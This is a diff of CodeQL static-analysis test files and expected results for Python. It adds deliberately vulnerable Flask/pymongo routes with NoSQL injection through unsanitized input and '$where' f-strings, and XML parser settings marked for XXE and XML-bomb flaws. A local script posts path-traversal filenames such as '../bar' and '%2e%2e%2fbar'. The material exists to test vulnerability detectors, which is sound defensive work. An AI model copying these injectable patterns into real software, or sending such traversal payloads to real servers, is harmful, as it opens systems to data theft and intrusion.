+| pymongo_test.py:29:16:29:51 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() |
+| pymongo_test.py:29:27:29:33 | ControlFlowNode for request | semmle.label | ControlFlowNode for request |
+| pymongo_test.py:29:27:29:38 | ControlFlowNode for Attribute | semmle.label | ControlFlowNode for Attribute |
+| pymongo_test.py:29:27:29:50 | ControlFlowNode for Subscript | semmle.label | ControlFlowNode for Subscript |
+| pymongo_test.py:33:34:33:73 | ControlFlowNode for Dict | semmle.label | ControlFlowNode for Dict |
+| pymongo_test.py:39:16:39:51 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() |
+| pymongo_test.py:39:27:39:33 | ControlFlowNode for request | semmle.label | ControlFlowNode for request |
+| pymongo_test.py:39:27:39:38 | ControlFlowNode for Attribute | semmle.label | ControlFlowNode for Attribute |
+| pymongo_test.py:39:27:39:50 | ControlFlowNode for Subscript | semmle.label | ControlFlowNode for Subscript |
+| pymongo_test.py:43:34:43:73 | ControlFlowNode for Dict | semmle.label | ControlFlowNode for Dict |
 subpaths
 #select
 | flask_mongoengine_bad.py:22:34:22:44 | ControlFlowNode for json_search | flask_mongoengine_bad.py:19:21:19:27 | ControlFlowNode for request | flask_mongoengine_bad.py:22:34:22:44 | ControlFlowNode for json_search | $@ NoSQL query contains an unsanitized $@ | flask_mongoengine_bad.py:22:34:22:44 | ControlFlowNode for json_search | This | flask_mongoengine_bad.py:19:21:19:27 | ControlFlowNode for request | user-provided value |
@@ -121,4 +139,6 @@ subpaths
 | mongoengine_bad.py:46:26:46:46 | ControlFlowNode for Dict | mongoengine_bad.py:42:21:42:27 | ControlFlowNode for request | mongoengine_bad.py:46:26:46:46 | ControlFlowNode for Dict | $@ NoSQL query contains an unsanitized $@ | mongoengine_bad.py:46:26:46:46 | ControlFlowNode for Dict | This | mongoengine_bad.py:42:21:42:27 | ControlFlowNode for request | user-provided value |
 | mongoengine_bad.py:53:34:53:44 | ControlFlowNode for json_search | mongoengine_bad.py:50:21:50:27 | ControlFlowNode for request | mongoengine_bad.py:53:34:53:44 | ControlFlowNode for json_search | $@ NoSQL query contains an unsanitized $@ | mongoengine_bad.py:53:34:53:44 | ControlFlowNode for json_search | This | mongoengine_bad.py:50:21:50:27 | ControlFlowNode for request | user-provided value |
 | mongoengine_bad.py:61:29:61:49 | ControlFlowNode for Dict | mongoengine_bad.py:57:21:57:27 | ControlFlowNode for request | mongoengine_bad.py:61:29:61:49 | ControlFlowNode for Dict | $@ NoSQL query contains an unsanitized $@ | mongoengine_bad.py:61:29:61:49 | ControlFlowNode for Dict | This | mongoengine_bad.py:57:21:57:27 | ControlFlowNode for request | user-provided value |
-| pymongo_bad.py:14:42:14:62 | ControlFlowNode for Dict | pymongo_bad.py:11:21:11:27 | ControlFlowNode for request | pymongo_bad.py:14:42:14:62 | ControlFlowNode for Dict | $@ NoSQL query contains an unsanitized $@ | pymongo_bad.py:14:42:14:62 | ControlFlowNode for Dict | This | pymongo_bad.py:11:21:11:27 | ControlFlowNode for request | user-provided value |
+| pymongo_test.py:15:42:15:62 | ControlFlowNode for Dict | pymongo_test.py:12:21:12:27 | ControlFlowNode for request | pymongo_test.py:15:42:15:62 | ControlFlowNode for Dict | $@ NoSQL query contains an unsanitized $@ | pymongo_test.py:15:42:15:62 | ControlFlowNode for Dict | This | pymongo_test.py:12:21:12:27 | ControlFlowNode for request | user-provided value |
+| pymongo_test.py:33:34:33:73 | ControlFlowNode for Dict | pymongo_test.py:29:27:29:33 | ControlFlowNode for request | pymongo_test.py:33:34:33:73 | ControlFlowNode for Dict | $@ NoSQL query contains an unsanitized $@ | pymongo_test.py:33:34:33:73 | ControlFlowNode for Dict | This | pymongo_test.py:29:27:29:33 | ControlFlowNode for request | user-provided value |
+| pymongo_test.py:43:34:43:73 | ControlFlowNode for Dict | pymongo_test.py:39:27:39:33 | ControlFlowNode for request | pymongo_test.py:43:34:43:73 | ControlFlowNode for Dict | $@ NoSQL query contains an unsanitized $@ | pymongo_test.py:43:34:43:73 | ControlFlowNode for Dict | This | pymongo_test.py:39:27:39:33 | ControlFlowNode for request | user-provided value |

python/ql/test/experimental/query-tests/Security/CWE-943/pymongo_bad.py

@@ -1,17 +0,0 @@
-from flask import Flask, request
-from pymongo import MongoClient
-import json
-
-app = Flask(__name__)
-client = MongoClient()
-
-
-@app.route("/")
-def home_page():
-    unsafe_search = request.args['search']
-    json_search = json.loads(unsafe_search)
-
-    return client.db.collection.find_one({'data': json_search})
-
-# if __name__ == "__main__":
-#     app.run(debug=True)

python/ql/test/experimental/query-tests/Security/CWE-943/pymongo_good.py

@@ -1,19 +0,0 @@
-from flask import Flask, request
-from pymongo import MongoClient
-from mongosanitizer.sanitizer import sanitize
-import json
-
-app = Flask(__name__)
-client = MongoClient()
-
-
-@app.route("/")
-def home_page():
-    unsafe_search = request.args['search']
-    json_search = json.loads(unsafe_search)
-    safe_search = sanitize(json_search)
-
-    return client.db.collection.find_one({'data': safe_search})
-
-# if __name__ == "__main__":
-#     app.run(debug=True)

python/ql/test/experimental/query-tests/Security/CWE-943/pymongo_test.py

@@ -0,0 +1,47 @@
+from flask import Flask, request
+from pymongo import MongoClient
+from mongosanitizer.sanitizer import sanitize
+import json
+
+app = Flask(__name__)
+client = MongoClient()
+
+
+@app.route("/bad")
+def bad():
+    unsafe_search = request.args['search']
+    json_search = json.loads(unsafe_search)
+
+    return client.db.collection.find_one({'data': json_search})
+
+
+@app.route("/good")
+def good():
+    unsafe_search = request.args['search']
+    json_search = json.loads(unsafe_search)
+    safe_search = sanitize(json_search)
+
+    return client.db.collection.find_one({'data': safe_search})
+
+
+@app.route("/bad2")
+def bad2():
+    event_id = json.loads(request.args['event_id'])
+    client = MongoClient("localhost", 27017, maxPoolSize=50)
+    db = client.localhost
+    collection = db['collection']
+    cursor = collection.find_one({"$where": f"this._id == '${event_id}'"})
+
+
+@app.route("/bad3")
+def bad3():
+    # using `get_` methods instead of subscript/attribute lookups
+    event_id = json.loads(request.args['event_id'])
+    client = MongoClient("localhost", 27017, maxPoolSize=50)
+    db = client.get_database(name="localhost")
+    collection = db.get_collection("collection")
+    cursor = collection.find_one({"$where": f"this._id == '${event_id}'"})
+
+
+if __name__ == "__main__":
+    app.run(debug=True)

python/ql/test/library-tests/ApiGraphs/py3/ModuleImportWithDots.expected

@@ -0,0 +1,5 @@
+moduleImportWithDots
+doesntFullyWork
+works
+| test.py:25:6:25:18 | ControlFlowNode for Attribute() |
+| test.py:28:10:28:17 | ControlFlowNode for method() |

python/ql/test/library-tests/ApiGraphs/py3/ModuleImportWithDots.ql

@@ -0,0 +1,18 @@
+private import python
+private import semmle.python.ApiGraphs
+
+query API::Node moduleImportWithDots() { result = API::moduleImport("a.b.c.d") }
+
+query API::CallNode doesntFullyWork() {
+  result = API::moduleImport("a.b.c.d").getMember("method").getACall()
+}
+
+query API::CallNode works() {
+  result =
+    API::moduleImport("a")
+        .getMember("b")
+        .getMember("c")
+        .getMember("d")
+        .getMember("method")
+        .getACall()
+}

python/ql/test/library-tests/ApiGraphs/py3/test.py

@@ -24,6 +24,9 @@ abcd = abc.d #$ use=moduleImport("a").getMember("b").getMember("c").getMember("d
 
 x5 = abcd.method() #$ use=moduleImport("a").getMember("b").getMember("c").getMember("d").getMember("method").getReturn()
 
+from a.b.c.d import method
+x5_alt = method() #$ use=moduleImport("a").getMember("b").getMember("c").getMember("d").getMember("method").getReturn()
+
 from a6 import m6 #$ use=moduleImport("a6").getMember("m6")
 
 x6 = m6().foo().bar() #$ use=moduleImport("a6").getMember("m6").getReturn().getMember("foo").getReturn().getMember("bar").getReturn()

python/ql/test/library-tests/ApiGraphs/py3/verifyApiGraphs.ql

@@ -1 +1,3 @@
+// Note: This is not using standard inline-expectation tests, so will not alert if you
+// have not manually added an annotation to a line!
 import TestUtilities.VerifyApiGraphs

python/ql/test/library-tests/frameworks/django-v2-v3/.gitignore

@@ -0,0 +1,5 @@
+db.sqlite3
+
+# The testapp/migrations/ folder needs to be comitted to git,
+# but we don't care to store the actual migrations
+testapp/migrations/

python/ql/test/library-tests/frameworks/django-v2-v3/FileField_test.py

@@ -0,0 +1,27 @@
+from django.db import models
+import django.db.models.fields.files
+
+def custom_path_function_1(instance, filename):
+    ensure_tainted(filename) # $ tainted
+
+def custom_path_function_2(instance, filename):
+    ensure_tainted(filename) # $ tainted
+
+def custom_path_function_3(instance, filename):
+    ensure_tainted(filename) # $ tainted
+
+def custom_path_function_4(instance, filename):
+    ensure_tainted(filename) # $ tainted
+
+
+class CustomFileFieldSubclass(models.FileField):
+    pass
+
+
+class MyModel(models.Model):
+    upload_1 = models.FileField(None, None, custom_path_function_1)
+    upload_2 = django.db.models.fields.files.FileField(upload_to=custom_path_function_2)
+
+    upload_3 = models.ImageField(upload_to=custom_path_function_3)
+
+    upload_4 = CustomFileFieldSubclass(upload_to=custom_path_function_4)

python/ql/test/library-tests/frameworks/django-v2-v3/response_test.py

@@ -1,5 +1,6 @@
 from django.http.response import HttpResponse, HttpResponseRedirect, HttpResponsePermanentRedirect, JsonResponse, HttpResponseNotFound
 from django.views.generic import RedirectView
+from django.views.decorators.csrf import csrf_protect
 import django.shortcuts
 import json
 
@@ -117,6 +118,7 @@ class CustomJsonResponse(JsonResponse):
     def __init__(self, banner, content, *args, **kwargs):
         super().__init__(content, *args, content_type="text/html", **kwargs)
 
+@csrf_protect  # $CsrfLocalProtectionEnabled=safe__custom_json_response
 def safe__custom_json_response(request):
     return CustomJsonResponse("ACME Responses", {"foo": request.GET.get("foo")})  # $HttpResponse mimetype=application/json MISSING: responseBody=Dict SPURIOUS: responseBody="ACME Responses"
 

python/ql/test/library-tests/frameworks/django-v2-v3/test_file_field

@@ -0,0 +1,31 @@
+#!/usr/bin/env python3
+
+# first run the server with
+# python manage.py makemigrations && python manage.py migrate && python manage.py runserver
+
+import requests
+
+requests.post(
+    "http://127.0.0.1:8000/app/file-test/",
+    files={"fieldname": ("foo/bar", open("/home/rasmus/TODO", "rb"))}
+)
+
+requests.post(
+    "http://127.0.0.1:8000/app/file-test/",
+    files={"fieldname": ("../bar", open("/home/rasmus/TODO", "rb"))}
+)
+
+requests.post(
+    "http://127.0.0.1:8000/app/file-test/",
+    files={"fieldname": (r"foo%2fbar", open("/home/rasmus/TODO", "rb"))}
+)
+
+requests.post(
+    "http://127.0.0.1:8000/app/file-test/",
+    files={"fieldname": (r"%2e%2e%2fbar", open("/home/rasmus/TODO", "rb"))}
+)
+
+requests.post(
+    "http://127.0.0.1:8000/app/file-test/",
+    files={"fieldname": (r"foo%c0%afbar", open("/home/rasmus/TODO", "rb"))}
+)

python/ql/test/library-tests/frameworks/django-v2-v3/testapp/models.py

@@ -1,3 +1,10 @@
+import os.path
+
 from django.db import models
 
-# Create your models here.
+def custom_path_function(instance, filename):
+    print(repr(os.path.join("rootdir", filename)))
+    raise NotImplementedError()
+
+class MyModel(models.Model):
+    upload = models.FileField(upload_to=custom_path_function)

python/ql/test/library-tests/frameworks/django-v2-v3/testapp/urls.py

@@ -1,8 +1,5 @@
 from django.urls import path, re_path
 
-# This version 1.x way of defining urls is deprecated in Django 3.1, but still works
-from django.conf.urls import url
-
 from . import views
 
 urlpatterns = [
@@ -11,11 +8,29 @@ urlpatterns = [
     # inline expectation tests (which thinks the `$` would mark the beginning of a new
     # line)
     re_path(r"^ba[rz]/", views.bar_baz),  # $routeSetup="^ba[rz]/"
-    url(r"^deprecated/", views.deprecated),  # $routeSetup="^deprecated/"
 
     path("basic-view-handler/", views.MyBasicViewHandler.as_view()),  # $routeSetup="basic-view-handler/"
     path("custom-inheritance-view-handler/", views.MyViewHandlerWithCustomInheritance.as_view()),  # $routeSetup="custom-inheritance-view-handler/"
 
     path("CustomRedirectView/<foo>", views.CustomRedirectView.as_view()),  # $routeSetup="CustomRedirectView/<foo>"
     path("CustomRedirectView2/<foo>", views.CustomRedirectView2.as_view()),  # $routeSetup="CustomRedirectView2/<foo>"
+
+    path("file-test/", views.file_test), # $routeSetup="file-test/"
 ]
+
+from django import __version__ as django_version
+
+if django_version[0] == "3":
+    # This version 1.x way of defining urls is deprecated in Django 3.1, but still works.
+    # However, it is removed in Django 4.0, so we need this guard to make our code runnable
+    from django.conf.urls import url
+
+    old_urlpatterns = urlpatterns
+
+    # we need this assignment to get our logic working... maybe it should be more
+    # sophisticated?
+    urlpatterns = [
+        url(r"^deprecated/", views.deprecated),  # $routeSetup="^deprecated/"
+    ]
+
+    urlpatterns += old_urlpatterns

python/ql/test/library-tests/frameworks/django-v2-v3/testapp/views.py

@@ -2,6 +2,7 @@ from django.http import HttpRequest, HttpResponse
 from django.views.generic import View, RedirectView
 from django.views.decorators.csrf import csrf_exempt
 
+from .models import MyModel
 
 def foo(request: HttpRequest):  # $requestHandler
     return HttpResponse("foo")  # $HttpResponse
@@ -45,3 +46,13 @@ class CustomRedirectView(RedirectView):
 class CustomRedirectView2(RedirectView):
 
     url = "https://example.com/%(foo)s"
+
+
+# Test of FileField upload_to functions
+def file_test(request: HttpRequest): # $ requestHandler
+    model = MyModel(upload=request.FILES['fieldname'])
+    try:
+        model.save()
+    except NotImplementedError:
+        pass
+    return HttpResponse("ok") # $ HttpResponse

python/ql/test/library-tests/frameworks/django-v2-v3/testproj/settings.py

@@ -40,7 +40,7 @@ INSTALLED_APPS = [
     'django.contrib.staticfiles',
 ]
 
-MIDDLEWARE = [
+MIDDLEWARE = [  # $CsrfProtectionSetting=false
     'django.middleware.security.SecurityMiddleware',
     'django.contrib.sessions.middleware.SessionMiddleware',
     'django.middleware.common.CommonMiddleware',
@@ -74,12 +74,12 @@ WSGI_APPLICATION = 'testproj.wsgi.application'
 # Database
 # https://docs.djangoproject.com/en/3.1/ref/settings/#databases
 
-# DATABASES = {
-#     'default': {
-#         'ENGINE': 'django.db.backends.sqlite3',
-#         'NAME': BASE_DIR / 'db.sqlite3',
-#     }
-# }
+DATABASES = {
+    'default': {
+        'ENGINE': 'django.db.backends.sqlite3',
+        'NAME': BASE_DIR / 'db.sqlite3',
+    }
+}
 
 
 # Password validation

python/ql/test/library-tests/frameworks/flask/taint_test.py

@@ -189,6 +189,7 @@ def test_taint(name = "World!", number="0", foo="foo"):  # $requestHandler route
     a = request.args
     b = a
     gl = b.getlist
+    files = request.files
     ensure_tainted(
         request.args, # $ tainted
         a, # $ tainted
@@ -202,6 +203,8 @@ def test_taint(name = "World!", number="0", foo="foo"):  # $requestHandler route
         a.getlist('key'), # $ tainted
         b.getlist('key'), # $ tainted
         gl('key'), # $ tainted
+
+        files.get('key').filename, # $ tainted
     )
 
     # aliasing tests

python/ql/test/library-tests/frameworks/lxml/parsing.py

@@ -0,0 +1,67 @@
+from io import StringIO
+import lxml.etree
+
+x = "some xml"
+
+# different parsing methods
+lxml.etree.fromstring(x) # $ decodeFormat=XML decodeInput=x xmlVuln='XXE' decodeOutput=lxml.etree.fromstring(..)
+lxml.etree.fromstring(text=x) # $ decodeFormat=XML decodeInput=x xmlVuln='XXE' decodeOutput=lxml.etree.fromstring(..)
+
+lxml.etree.fromstringlist([x]) # $ decodeFormat=XML decodeInput=List xmlVuln='XXE' decodeOutput=lxml.etree.fromstringlist(..)
+lxml.etree.fromstringlist(strings=[x]) # $ decodeFormat=XML decodeInput=List xmlVuln='XXE' decodeOutput=lxml.etree.fromstringlist(..)
+
+lxml.etree.XML(x) # $ decodeFormat=XML decodeInput=x xmlVuln='XXE' decodeOutput=lxml.etree.XML(..)
+lxml.etree.XML(text=x) # $ decodeFormat=XML decodeInput=x xmlVuln='XXE' decodeOutput=lxml.etree.XML(..)
+
+lxml.etree.XMLID(x) # $ decodeFormat=XML decodeInput=x xmlVuln='XXE' decodeOutput=lxml.etree.XMLID(..)
+lxml.etree.XMLID(text=x) # $ decodeFormat=XML decodeInput=x xmlVuln='XXE' decodeOutput=lxml.etree.XMLID(..)
+
+xml_file = 'xml_file'
+lxml.etree.parse(xml_file) # $ decodeFormat=XML decodeInput=xml_file xmlVuln='XXE' decodeOutput=lxml.etree.parse(..) getAPathArgument=xml_file
+lxml.etree.parse(source=xml_file) # $ decodeFormat=XML decodeInput=xml_file xmlVuln='XXE' decodeOutput=lxml.etree.parse(..) getAPathArgument=xml_file
+
+lxml.etree.parseid(xml_file) # $ decodeFormat=XML decodeInput=xml_file xmlVuln='XXE' decodeOutput=lxml.etree.parseid(..) getAPathArgument=xml_file
+lxml.etree.parseid(source=xml_file) # $ decodeFormat=XML decodeInput=xml_file xmlVuln='XXE' decodeOutput=lxml.etree.parseid(..) getAPathArgument=xml_file
+
+lxml.etree.iterparse(xml_file) # $ decodeFormat=XML decodeInput=xml_file xmlVuln='XXE' decodeOutput=lxml.etree.iterparse(..) getAPathArgument=xml_file
+lxml.etree.iterparse(source=xml_file) # $ decodeFormat=XML decodeInput=xml_file xmlVuln='XXE' decodeOutput=lxml.etree.iterparse(..) getAPathArgument=xml_file
+
+# With default parsers (nothing changed)
+parser = lxml.etree.XMLParser()
+lxml.etree.fromstring(x, parser=parser) # $ decodeFormat=XML decodeInput=x xmlVuln='XXE' decodeOutput=lxml.etree.fromstring(..)
+
+parser = lxml.etree.get_default_parser()
+lxml.etree.fromstring(x, parser=parser) # $ decodeFormat=XML decodeInput=x xmlVuln='XXE' decodeOutput=lxml.etree.fromstring(..)
+
+# manual use of feed method
+parser = lxml.etree.XMLParser()
+parser.feed(x) # $ decodeFormat=XML decodeInput=x xmlVuln='XXE'
+parser.feed(data=x) # $ decodeFormat=XML decodeInput=x xmlVuln='XXE'
+parser.close() # $ decodeOutput=parser.close()
+
+# XXE-safe
+parser = lxml.etree.XMLParser(resolve_entities=False)
+lxml.etree.fromstring(x, parser) # $ decodeFormat=XML decodeInput=x decodeOutput=lxml.etree.fromstring(..)
+lxml.etree.fromstring(x, parser=parser) # $ decodeFormat=XML decodeInput=x decodeOutput=lxml.etree.fromstring(..)
+
+# XXE-vuln
+parser = lxml.etree.XMLParser(resolve_entities=True)
+lxml.etree.fromstring(x, parser=parser) # $ decodeFormat=XML decodeInput=x xmlVuln='XXE' decodeOutput=lxml.etree.fromstring(..)
+
+# Billion laughs vuln (also XXE)
+parser = lxml.etree.XMLParser(huge_tree=True)
+lxml.etree.fromstring(x, parser=parser) # $ decodeFormat=XML decodeInput=x xmlVuln='XML bomb' xmlVuln='XXE' decodeOutput=lxml.etree.fromstring(..)
+
+# Safe for both Billion laughs and XXE
+parser = lxml.etree.XMLParser(resolve_entities=False, huge_tree=True)
+lxml.etree.fromstring(x, parser=parser) # $ decodeFormat=XML decodeInput=x decodeOutput=lxml.etree.fromstring(..)
+
+# DTD retrival vuln (also XXE)
+parser = lxml.etree.XMLParser(load_dtd=True, no_network=False)
+lxml.etree.fromstring(x, parser=parser) # $ decodeFormat=XML decodeInput=x xmlVuln='DTD retrieval' xmlVuln='XXE' decodeOutput=lxml.etree.fromstring(..)
+
+# iterparse configurations ... this doesn't use a parser argument but takes MOST (!) of
+# the normal XMLParser arguments. Specifically, it doesn't allow disabling XXE :O
+
+lxml.etree.iterparse(xml_file, huge_tree=True) # $ decodeFormat=XML decodeInput=xml_file xmlVuln='XML bomb' xmlVuln='XXE' decodeOutput=lxml.etree.iterparse(..) getAPathArgument=xml_file
+lxml.etree.iterparse(xml_file, load_dtd=True, no_network=False) # $ decodeFormat=XML decodeInput=xml_file xmlVuln='DTD retrieval' xmlVuln='XXE' decodeOutput=lxml.etree.iterparse(..) getAPathArgument=xml_file

python/ql/test/library-tests/frameworks/lxml/test.py

@@ -1,21 +0,0 @@
-from lxml import etree
-from io import StringIO
-
-def test_parse():
-    tree = etree.parse(StringIO('<foo><bar></bar></foo>'))
-    r = tree.xpath('/foo/bar')  # $ getXPath='/foo/bar'
-
-def test_XPath_class():
-    root = etree.XML("<root><a>TEXT</a></root>")
-    find_text = etree.XPath("path")  # $ constructedXPath="path"
-    text = find_text(root)[0]
-
-def test_ETXpath_class():
-    root = etree.XML("<root><a>TEXT</a></root>")
-    find_text = etree.ETXPath("path")  # $ constructedXPath="path"
-    text = find_text(root)[0]
-
-def test_XPathEvaluator_class():
-    root = etree.XML("<root><a>TEXT</a></root>")
-    search_root = etree.XPathEvaluator(root)
-    text = search_root("path")[0]  # $ getXPath="path"

python/ql/test/library-tests/frameworks/lxml/xpath.py

@@ -0,0 +1,21 @@
+from lxml import etree
+from io import StringIO
+
+def test_parse():
+    tree = etree.parse(StringIO('<foo><bar></bar></foo>')) # $ decodeFormat=XML decodeInput=StringIO(..) decodeOutput=etree.parse(..) xmlVuln='XXE' getAPathArgument=StringIO(..)
+    r = tree.xpath('/foo/bar')  # $ getXPath='/foo/bar'
+
+def test_XPath_class():
+    root = etree.XML("<root><a>TEXT</a></root>") # $ decodeFormat=XML decodeInput="<root><a>TEXT</a></root>" decodeOutput=etree.XML(..) xmlVuln='XXE'
+    find_text = etree.XPath("path")  # $ constructedXPath="path"
+    text = find_text(root)[0]
+
+def test_ETXpath_class():
+    root = etree.XML("<root><a>TEXT</a></root>") # $ decodeFormat=XML decodeInput="<root><a>TEXT</a></root>" decodeOutput=etree.XML(..) xmlVuln='XXE'
+    find_text = etree.ETXPath("path")  # $ constructedXPath="path"
+    text = find_text(root)[0]
+
+def test_XPathEvaluator_class():
+    root = etree.XML("<root><a>TEXT</a></root>") # $ decodeFormat=XML decodeInput="<root><a>TEXT</a></root>" decodeOutput=etree.XML(..) xmlVuln='XXE'
+    search_root = etree.XPathEvaluator(root)
+    text = search_root("path")[0]  # $ getXPath="path"

python/ql/test/library-tests/frameworks/stdlib/XPathExecution.py

@@ -2,7 +2,7 @@ match = "dc:title"
 ns = {'dc': 'http://purl.org/dc/elements/1.1/'}
 
 import xml.etree.ElementTree as ET
-tree = ET.parse('country_data.xml')
+tree = ET.parse('country_data.xml') # $ decodeFormat=XML decodeInput='country_data.xml' decodeOutput=ET.parse(..) xmlVuln='XML bomb' getAPathArgument='country_data.xml'
 root = tree.getroot()
 
 root.find(match, namespaces=ns)  # $ getXPath=match
@@ -10,8 +10,13 @@ root.findall(match, namespaces=ns)  # $ getXPath=match
 root.findtext(match, default=None, namespaces=ns)  # $ getXPath=match
 
 tree = ET.ElementTree()
-tree.parse("index.xhtml")
+tree.parse("index.xhtml") # $ decodeFormat=XML decodeInput="index.xhtml" decodeOutput=tree.parse(..) xmlVuln='XML bomb' getAPathArgument="index.xhtml"
 
 tree.find(match, namespaces=ns)  # $ getXPath=match
 tree.findall(match, namespaces=ns)  # $ getXPath=match
 tree.findtext(match, default=None, namespaces=ns)  # $ getXPath=match
+
+parser = ET.XMLParser()
+parser.feed("<foo>bar</foo>") # $ decodeFormat=XML decodeInput="<foo>bar</foo>" xmlVuln='XML bomb'
+tree = parser.close() # $ decodeOutput=parser.close()
+tree.find(match, namespaces=ns)  # $ getXPath=match

python/ql/test/library-tests/frameworks/stdlib/io_test.py

@@ -0,0 +1,47 @@
+from io import StringIO, BytesIO
+
+TAINTED_STRING = "TS"
+TAINTED_BYTES = b"TB"
+
+def ensure_tainted(*args):
+    print("ensure_tainted")
+    for arg in args:
+        print("", repr(arg))
+
+
+def test_stringio():
+    ts = TAINTED_STRING
+
+    x = StringIO()
+    x.write(ts)
+    x.seek(0)
+
+    ensure_tainted(
+        StringIO(ts), # $ tainted
+        StringIO(initial_value=ts), # $ tainted
+        x, # $ tainted
+
+        x.read(), # $ tainted
+        StringIO(ts).read(), # $ tainted
+    )
+
+
+def test_bytesio():
+    tb = TAINTED_BYTES
+
+    x = BytesIO()
+    x.write(tb)
+    x.seek(0)
+
+    ensure_tainted(
+        BytesIO(tb), # $ tainted
+        BytesIO(initial_bytes=tb), # $ tainted
+        x, # $ tainted
+
+        x.read(), # $ tainted
+        BytesIO(tb).read(), # $ tainted
+    )
+
+
+test_stringio()
+test_bytesio()

python/ql/test/library-tests/frameworks/stdlib/xml_dom.py

@@ -0,0 +1,31 @@
+from io import StringIO
+import xml.dom.minidom
+import xml.dom.pulldom
+import xml.sax
+
+x = "some xml"
+
+# minidom
+xml.dom.minidom.parse(StringIO(x)) # $ decodeFormat=XML decodeInput=StringIO(..) xmlVuln='XML bomb' decodeOutput=xml.dom.minidom.parse(..) getAPathArgument=StringIO(..)
+xml.dom.minidom.parse(file=StringIO(x)) # $ decodeFormat=XML decodeInput=StringIO(..) xmlVuln='XML bomb' decodeOutput=xml.dom.minidom.parse(..) getAPathArgument=StringIO(..)
+
+xml.dom.minidom.parseString(x) # $ decodeFormat=XML decodeInput=x xmlVuln='XML bomb' decodeOutput=xml.dom.minidom.parseString(..)
+xml.dom.minidom.parseString(string=x) # $ decodeFormat=XML decodeInput=x xmlVuln='XML bomb' decodeOutput=xml.dom.minidom.parseString(..)
+
+
+# pulldom
+xml.dom.pulldom.parse(StringIO(x))['START_DOCUMENT'][1] # $ decodeFormat=XML decodeInput=StringIO(..) xmlVuln='XML bomb' decodeOutput=xml.dom.pulldom.parse(..) getAPathArgument=StringIO(..)
+xml.dom.pulldom.parse(stream_or_string=StringIO(x))['START_DOCUMENT'][1] # $ decodeFormat=XML decodeInput=StringIO(..) xmlVuln='XML bomb' decodeOutput=xml.dom.pulldom.parse(..) getAPathArgument=StringIO(..)
+
+xml.dom.pulldom.parseString(x)['START_DOCUMENT'][1] # $ decodeFormat=XML decodeInput=x xmlVuln='XML bomb' decodeOutput=xml.dom.pulldom.parseString(..)
+xml.dom.pulldom.parseString(string=x)['START_DOCUMENT'][1] # $ decodeFormat=XML decodeInput=x xmlVuln='XML bomb' decodeOutput=xml.dom.pulldom.parseString(..)
+
+
+# These are based on SAX parses, and you can specify your own, so you can expose yourself to XXE (yay/)
+parser = xml.sax.make_parser()
+parser.setFeature(xml.sax.handler.feature_external_ges, True)
+xml.dom.minidom.parse(StringIO(x), parser) # $ decodeFormat=XML decodeInput=StringIO(..) xmlVuln='XML bomb' xmlVuln='DTD retrieval' xmlVuln='XXE' decodeOutput=xml.dom.minidom.parse(..) getAPathArgument=StringIO(..)
+xml.dom.minidom.parse(StringIO(x), parser=parser) # $ decodeFormat=XML decodeInput=StringIO(..) xmlVuln='XML bomb' xmlVuln='DTD retrieval' xmlVuln='XXE' decodeOutput=xml.dom.minidom.parse(..) getAPathArgument=StringIO(..)
+
+xml.dom.pulldom.parse(StringIO(x), parser) # $ decodeFormat=XML decodeInput=StringIO(..) xmlVuln='XML bomb' xmlVuln='DTD retrieval' xmlVuln='XXE' decodeOutput=xml.dom.pulldom.parse(..) getAPathArgument=StringIO(..)
+xml.dom.pulldom.parse(StringIO(x), parser=parser) # $ decodeFormat=XML decodeInput=StringIO(..) xmlVuln='XML bomb' xmlVuln='DTD retrieval' xmlVuln='XXE' decodeOutput=xml.dom.pulldom.parse(..) getAPathArgument=StringIO(..)

python/ql/test/library-tests/frameworks/stdlib/xml_etree.py

@@ -0,0 +1,49 @@
+from io import StringIO
+import xml.etree.ElementTree
+
+x = "some xml"
+
+# Parsing in different ways
+xml.etree.ElementTree.fromstring(x) # $ decodeFormat=XML decodeInput=x xmlVuln='XML bomb' decodeOutput=xml.etree.ElementTree.fromstring(..)
+xml.etree.ElementTree.fromstring(text=x) # $ decodeFormat=XML decodeInput=x xmlVuln='XML bomb' decodeOutput=xml.etree.ElementTree.fromstring(..)
+
+xml.etree.ElementTree.fromstringlist([x]) # $ decodeFormat=XML decodeInput=List xmlVuln='XML bomb' decodeOutput=xml.etree.ElementTree.fromstringlist(..)
+xml.etree.ElementTree.fromstringlist(sequence=[x]) # $ decodeFormat=XML decodeInput=List xmlVuln='XML bomb' decodeOutput=xml.etree.ElementTree.fromstringlist(..)
+
+xml.etree.ElementTree.XML(x) # $ decodeFormat=XML decodeInput=x xmlVuln='XML bomb' decodeOutput=xml.etree.ElementTree.XML(..)
+xml.etree.ElementTree.XML(text=x) # $ decodeFormat=XML decodeInput=x xmlVuln='XML bomb' decodeOutput=xml.etree.ElementTree.XML(..)
+
+xml.etree.ElementTree.XMLID(x) # $ decodeFormat=XML decodeInput=x xmlVuln='XML bomb' decodeOutput=xml.etree.ElementTree.XMLID(..)
+xml.etree.ElementTree.XMLID(text=x) # $ decodeFormat=XML decodeInput=x xmlVuln='XML bomb' decodeOutput=xml.etree.ElementTree.XMLID(..)
+
+xml.etree.ElementTree.parse(StringIO(x)) # $ decodeFormat=XML decodeInput=StringIO(..) xmlVuln='XML bomb' decodeOutput=xml.etree.ElementTree.parse(..) getAPathArgument=StringIO(..)
+xml.etree.ElementTree.parse(source=StringIO(x)) # $ decodeFormat=XML decodeInput=StringIO(..) xmlVuln='XML bomb' decodeOutput=xml.etree.ElementTree.parse(..) getAPathArgument=StringIO(..)
+
+xml.etree.ElementTree.iterparse(StringIO(x)) # $ decodeFormat=XML decodeInput=StringIO(..) xmlVuln='XML bomb' decodeOutput=xml.etree.ElementTree.iterparse(..) getAPathArgument=StringIO(..)
+xml.etree.ElementTree.iterparse(source=StringIO(x)) # $ decodeFormat=XML decodeInput=StringIO(..) xmlVuln='XML bomb' decodeOutput=xml.etree.ElementTree.iterparse(..) getAPathArgument=StringIO(..)
+
+tree = xml.etree.ElementTree.ElementTree()
+tree.parse("file.xml") # $ decodeFormat=XML decodeInput="file.xml" xmlVuln='XML bomb' decodeOutput=tree.parse(..) getAPathArgument="file.xml"
+tree.parse(source="file.xml") # $ decodeFormat=XML decodeInput="file.xml" xmlVuln='XML bomb' decodeOutput=tree.parse(..) getAPathArgument="file.xml"
+
+
+# With parsers (no options available to disable/enable security features)
+parser = xml.etree.ElementTree.XMLParser()
+xml.etree.ElementTree.fromstring(x, parser=parser) # $ decodeFormat=XML decodeInput=x xmlVuln='XML bomb' decodeOutput=xml.etree.ElementTree.fromstring(..)
+
